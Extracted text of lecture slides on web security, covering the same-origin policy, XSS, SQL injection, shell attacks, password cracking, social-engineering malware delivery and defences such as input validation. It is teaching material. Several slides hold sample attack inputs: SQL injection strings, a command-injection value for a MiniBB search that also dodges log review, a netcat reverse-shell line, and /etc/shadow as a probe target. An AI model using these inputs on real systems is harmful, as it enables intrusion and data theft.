1. Web security

2. Objectives
Understand the complexity of Web infrastructure and current trends of Web threat
Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks

3. Introduction
Average user spends 16 h/month online (32 h/month in U.S.) [1]
People spend much time interacting with Web, Web applications (apps)
Their (lack of) security has major impact
Interaction via Web browser ⋯ ⋯
Source: [2], [3]

4. Why Web Security: a Real Business Problem
> 60% of total attack attempts observed on the Net are against Web applications
> 80% of vulnerabilities discovered are in web apps
Independent security audit
Regulatory compliance
* SANS/TippingPoint, based on March-August 2009 data

5. Web Browser Workflow
Source: [4]

6. HyperText Transfer Protocol (HTTP)
Browsers use HTTP to fetch Web content
Request/response based protocol
Stateless
HTTP requests: [4]
For a webpage, script, image, file, etc.
Usually expose info about client, browser [5]
HTTP response: [4]
A file (HTML, image, etc.)
Can redirect to another webpage

7. Web Applications Big trend: software as a (Web-based) service
Online banking, shopping, government, etc.
Cloud computing
Applications hosted on Web servers
Written in a mixture of PHP, Java, Perl, Python, C, ASP
Security is rarely the main concern
Poorly written scripts with inadequate input validation
Sensitive data stored in world-readable files

8. Typical Web Application Design
Runs on a Web server or application server
Takes input from Web users (via Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via Web server)
Dynamically generated HTML pages
Contain content from many different sources, often including regular users
Blogs, social networks, photo-sharing websites…
Web advertisements, usually third party
A webpage can have content coming from different domains

9. Two Sides of Web Security
Web browser (front end)
Can be attacked by any website it visits
Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data
Web application (back end)
Runs at website
Banks, online merchants, blogs, Google Apps, etc.
Written in Javascript, PHP, ASP, JSP, Ruby, …
Many potential bugs: XSS, SQL injection, XSRF
Attacks lead to stolen credit cards, defaced sites, etc.

10. Basics – Browser Security
Web browser stores info, e.g., cookies, user credentials, etc.
Same origin policy (SOP): only code running on “the same” website as other code can access latter’s methods/properties [11]
Origin determined by app protocol, domain name, and port #
SOP critical to browser security

11. Basics – Browser Security
URL
Outcome
Reason
Success
Same protocol and host
Failure
Different port
Different protocol
Different host

12. Chicago Tribune Home Page

13. How Are Legitimate Web Sites Compromised?
SQL Injection Attacks
Malicious Advertisements
Many Web sites today display advertisements hosted by third-party advertising sites
Volume of ads published automatically makes detection difficult
Random appearances further compounds the detection
Search Engine Result Redirection
Attacks on the backend virtual hosting companies
Cross-site scripting (XSS) attacks
Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)

14. We need application layer protection as well!

15. Attacks Types

16. Denial-of-Service (DoS)
Denial of Service (DoS) attack: Attacker causes web server to be unavailable.
How attack is performed:
Attacker frequently requests many pages from your web site.
distributed DoS (DDoS): DoS using lots of computers
Your server cannot handle this many requests at a time, so it turns into a smoldering pile of goo (or just becomes very slow).
Problems that this attack can cause:
Users cannot get to your site.
Online store's server crashes -> store loses potential revenue.
Server may crash and lose or corrupt important data.
All the bandwidth used by the DoSers may cost you $$$.

17. Packet sniffing
packet sniffing: Listening to traffic sent on a network.
Many internet protocols (http, aim, ) are unsecure.
If an attacker is on the same local network (LAN) as you, he can:
read your /IMs as you send them
see what web sites you are viewing
grab your password as it's being sent to the server
solutions:
Use secure protocols (ssh, https)
Encryption
Don't let creeps on your LAN/wifi

18. Password cracking
password cracking: Guessing the passwords of privileged users of your system.
How attack is performed:
brute force attack: Attacker uses software that sequentially tries every possible password.
dictionary attack: Attacker uses software that sequentially tries passwords based on words in a dictionary.
every word in the dictionary
combinations of words, numbers, etc.
What you can do about it:
Force users to have secure passwords.
Block an IP address from logging in after N failed attempts.

19. Phishing/social engineering
phishing: Masqueraded mails or web sites.
social engineering: Attempts to manipulate users, such as fraudulently acquiring passwords or credit card numbers.
Problems:
If trusted users of your system are tricked into giving out their personal information, attackers can use this to log in as those users and compromise your system.

20. Privilege escalation
privilege escalation: Attacker becomes able to run code on your server as a privileged user.
Example: Perhaps normal users aren't able to directly query your database. But an attacker may find a flaw in your security letting him run as an administrator and perform the query.
Once you're running as root, You own the server. You can do anything you want!

21. Cross-site scripting (XSS)
cross-site scripting: Causing one person's script code to be executed when a user browses to another site.
Example: Visit google.com, but evil.com's JavaScript runs.
How attack is performed:
Attacker finds unsecure code on target site.
Attacker uses hole to inject JavaScript into the page.
User visits page, sees malicious script code.

22. Cross-site scripting (XSS)
Attacker goal: their code into browser
XSS forces a website visitor to execute malicious code in his/her browser
Count for roughly 80% of all documented security vulnerabilities

23. XSS Risks XSS abuses render engines or plug-ins Steal browser cookies
Steal session info for replay attack
Malware or bot installation
Redirect or phishing attempt

24. XSS Detection
A client usually is not supposed to send scripts to servers
If the server receives <SCRIPT>… or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred
A sanitized script could look like &ls;SCRIPT>…
Any user input must be preprocessed before it is used inside HTML

25. XSS Example 2
Trudy sends a link of the following URL to Bob that will take him to a personalized page:
A page is returned that contains the malicious script, and Bob’s browser executes the script causing his session cookie to be sent to Trudy
Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

26. SQL Injection
Malicious SQL statements run on a database and thus attack the server
Causing undesired SQL queries to be run on your database.
Often caused when untrusted input is pasted into a SQL query
PHP: "SELECT * FROM Users WHERE name='$name';";
specify a user name of: x' OR 'a'='a
SELECT * FROM Users WHERE name='x' OR 'a'='a';

27. SQL Injection Example
Trudy accesses Bob’s website; in which he does not validate input on his sign in form
Runs a SQL statement like the following:
select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe’;
Set username to ' or '1'='1
select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’;
Effect: picks any row where the username is blank and the password matches or any row where true.
Add “limit 1” to pick the first row
In the password field, she types as her password:
X” OR “x”=“x
Manipulates the server into running the following SQL command:
SELECT * FROM ACCOUNTS WHERE username = “USER_NAME” AND password=“X” OR “x”=“x”;
Selects all account information

28. SQL Injection Detection
Input validation on any outgoing SQL statements from the web server to the database server
Filter
Apostrophes, semicolons, percent symbols, hyphens, underscores, …
Any character that has special meanings must be escaped, .e.g., convert ’ into \’
Only works for string inputs
Different databases have different rules for escaping
Check the data type (e.g., make sure it’s an integer)

29. Control an actual machine like a web server
Shell Attacks
Control an actual machine like a web server

30. Shell Attacks Inject commands into scripts that use Linux utilities
E.g., with “;” as command separator in UNIX/LINUX
CGI programs like perl can use command-line programs (e.g. grep, ls)
Unsanitized input as arguments can lead to command execution.

31. Shell Attacks Demo Search engine in MiniBB webserver executes
system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");
Put phrase as: >/dev/null; id; echo randomdata
Hide user ID
Store random data in logs to evade detection
We can even get a remote shell !
>/dev/null; nc cal e /bin/sh

32. Defense Approaches Web firewall/IDS Static code analysis
ModSecurity for Apache
Commercial: SecureSphere from Imperva
Static code analysis
Open source: Nikto
Commercial:
Acutenix Web Vulnerability Scanner
N-stalker
Education on good coding
HTML encoding on input (server-side)
Input validation/filtering

33. GETTING ONTO A USER’S COMPUTER
Source: Web Based Attacks, Symantec 2009

34. Automatic Attack Exposure
Techniques used to deliver malware from Websites to a users computer.
Exposure
Browsing a website
No user interaction is required
Executable content is automatically downloaded

35. “Click Jacking”

36. Social Engineering
People are tricked into performing actions they would not otherwise want to perform
Source: Web Based Attacks, Symantec 2009

37. Types of Social Engineering Attacks
Fake Codec
Malicious Peer-to-Peer (P2P) Files
Malicious Advertisements
Fake Scanner Web Page
Blog Spam
Other Attack Vectors

38. Fake Codec User is prompted to install a missing codec
Codec is actually malware code
Usually a trojan horse

39. Malicious Peer-to-Peer (P2P) Files
Malware authors bind content into popular applications
Files named after celebrities, popular bands
Uploaded to popular P2P sites where they are downloaded by unsuspecting users
Openly available how-to materials on the internet
Details how to build and distribute malware
Pay-Per-Install malware

40. Fake Scanner Web Page
Create a web site or product that misrepresents the truth
JavaScript pop-ups notifying of false need to install operating system updates
Tools that claim to scan for and remove adult images, etc.
Source: Web Based Attacks, Symantec 2009

41. Blog Spam Alluring links posted on blogs
Links embedded in blog comments
Direct users to sites that leverage social engineering tricks or browser exploits to spread malware

42. User input attacks
Bypassing client-side input restrictions and validation
maxlength limits on an input text field
choices not listed in a select box
hidden input fields
modifying or disabling client-side JavaScript validation code

43. Guessing files/directories
security through obscurity: Many reachable files/resources are hidden only by the fact that there is no link to them.
Try common file/folder/commands to see what happens:
/etc/passwd , /etc/shadow , cat, ls, grep
guess file names based on others
page11.php --> page12.php
loginfailure.jsp --> loginsuccess.jsp
accounts/fred.html --> accounts/sue.html
brute force / web spiders
port scanners

44. Other attacks Attacking GET parameters Attacking hidden input fields
Attacking cookies
Cross-site request forgery (CSRF)
...

45. Other Attack Vectors Spam Pirated software sites
s contain links directing people to drive by download, fake scanner/codec, and malware sites
Pirated software sites
Pirated versions of software are bundled with or comprised solely of trojan horses

46. Thinking like an attacker: Finding vulnerabilities

47. Panning for gold View Source, and look for: HTML comments script code
other sensitive information in code: IP/ addresses, SQL queries, hidden fields,...
watch HTTP requests/responses
look for hidden pages, files, parameters to target
error messages sent to your browser by app
200: OK 400: Invalid request
403: Forbidden 404: File not found
500: Internal server error

48. Input forms Forms let users pass parameters to the web server.
Parameters are passed using GET or POST requests.
GET: parameters are contained in the request URL.
POST: parameters are contained in the HTTP packet header.
harder for the user to see, but no more secure than GET
Forms provide a rich attack ground...

49. Form validation
validation: Examining form parameters to make sure they are acceptable before/as they are submitted.
nonempty, alphabetical, numeric, length, ...
client-side: HTML/JS checks values before request is sent.
server-side: JSP/Ruby/PHP/etc. checks values received.
Some validation is performed by restricting the user's choices.
select boxes
input text boxes with maxlength attribute
key event listeners that erase certain key presses

50. How to Protect Yourself
Update and Patch Software
Get latest OS, Browser, Application patches
Browswer Plug-in updates often forgotten
Endpoint Protection Software
Anti-virus software for signature based detection and behavioral monitoring
Update Protection Software Subscription
Could miss 70,000 new unique virus variants for one week
Be Suspicious
Avoid things that seem too good to be true
Use safe search functionality in browsers
Adopt Strong Password Policy

51. Sources
Sources
Chapter 7: Web Development & Design Foundations with HTML5, 7th Edition.